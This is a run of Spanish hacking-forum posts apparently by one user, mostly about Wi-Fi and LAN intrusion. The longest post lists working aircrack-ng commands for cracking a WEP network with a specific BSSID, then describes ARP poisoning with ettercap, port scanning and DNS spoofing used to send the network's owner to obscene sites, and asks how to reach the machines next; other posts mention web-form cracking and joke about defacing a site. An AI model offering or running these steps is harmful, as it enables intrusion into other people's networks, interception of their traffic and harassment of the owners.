Mensajes

Mmmm, no creo que sea eso. se supone que con el bypass que he hecho al php.ini se soluciona, pero vamos, voy a seguir viendo documentacion.
EDIT: He visto esto, pero no se que hace exactamente el exploit, alguien me lo explica?
http://foro.undersecurity.net/read.php?15,1431,1431

Lei algo sobre firewall de aplicaciones... a nivel de APP vamos...
quizas puedas descubrir algo...
Ni recuerdo donde xD

Saludos

Cada vez me gusta mas la seguridad wireless, y es que la mayoria de sistemas se pueden comprometer facilmente (relativo...) con aceso al wireless!

Grandioso!

Saludos

Bestial sin duda, bestial yo ya estoy diseñando el mio con multitud de parametros posibles.

Saludos

LO bueno es reirse viendo que piensan que son los mas listos del mundo y que van a la moda xD que por cierto creo que es algo totalmente superficial.

Saludos

No se si es eso, pero creo que se refiere a que quiere cambiar las paginas de configuración del router, o simplemente la pagina de inicio xD

Ambas cosas se pueden hacer spoofeando el DNS...


Saludos

Si de veras tienes pruebas de que ha cometido un delito, lo primero refuerza la seguridad de tu red, con WPA, filtrado de macs...
Y lo segundo, guarda LOGs para poder denunciarle ante la policia, y que la ley haga el resto.


Saludos

Jaja, el problema es que la ley no llega a segun que sitios....

Saludos

Yo tambien estoy interesado en crackeo de formularios web, ya estoy estudiando la posibilidad de usar medusa web-form bajo mi Backtrack4.

Si descubres algo mas, comentalo para todos


Saludos

Hola a todos, intentando asaltar uan red para llegar hasta el PC, decir que estoy totalmente autorizado a hacerlo, he conseguido llegar la lan interna de dicha red, primero hakeando el sistema wifi, y entrando en la WLAN con el aircrack suite!

Os explico lo que he hecho:

Escaneamos redes con:


airodump-ng mon0

Escojemos nuestra red para crackear:

Su canal y maca incluidas:

airodump-ng -w wep -c 11 --bssid 00:15:F2:F0:32:CD mon0

Hacemos una falsa autentificación:

aireplay-ng -1 0 -a 00:15:F2:F0:32:CD mon0

Capturamos replies:

aireplay-ng -3 -b 00:15:F2:F0:32:CD mon0

Generamos trafico en caso de que no haya clientes:

aireplay-ng -3 -b 00:15:F2:F0:32:CD -h 00:08:D3:38:AE:6E mon0

Si hace falta reforzamos la des-autentificación:

aireplay-ng -1 0 -a 00:15:F2:F0:32:CD mon0

Y veremos como suben los IVS! Y listo para crackear con aircrack-ng


Son mis apuntes extraidos para el ataque, la cosa es que estando una vez en su lan, tengo que encontrar algun vector de ataque para saltar al nivel de maquina, la cosa es la siguiente:

He hecho un mapeo de la lan con lanmap, y he sacado una grafica, que me ha aclarado las ideas bastante bien.

Posteriormente he identificado 2 equipos aparte del mio en dicha red, uno que me daba como un BSD, y resulto ue era un PS3 conectada a la wlan y un windows XP:
Win2k SP2

La cosa esta en que he escaneado con OpenVas, el ordenador de esa Lan y la unica advertice que he encontrado ha sido una ms03_34 de riesgo low, que no es explotable en este momento.

He estado sniffando la red y buscando datos comprometedores pero el ettercap con arp poisoning y el router en el TARGET 2 y el equipo en el TARGET 1, no capta nada por mas que navegan por la red, pues veo las paquetes, y puedo apreciar datos de formularios.

He escaneado los puertos de los equipos de la red y no hay nada activo en los PC´s, asi descarto un posible exploit, en todo caso estaba esperanzado de entrar por el bug de netapi de SMB en el puerto 445 pero no hubo suerte.

He jugado spoofeando dns y volviendo loco al propietario llevandolo a webs de caracter obsceno y extraño que ha provocado poco mas que una situacion curiosa xD

Que me recomendais hacer ahora una vez estoy en este punto?


Saludos

No sé si buscas algo como esto: http://webcopier.uptodown.com/

De todas formas, prueba a ponerte en contacto vía E-Mail con la DGT, y cuéntales tu problema, a ver si te dan solución.

lolz va a decirles que le envien las preguntas? XDD y de paso las respuestas

Mejo defacear la web entera, y cuando lo hayas hecho te reportas xD
Lo que creo que se refiere GNU Lopez Freedom daemon, es a que reporte la vulnerabilidad, o que simplemente les pida el temario y estudie xD

Saludos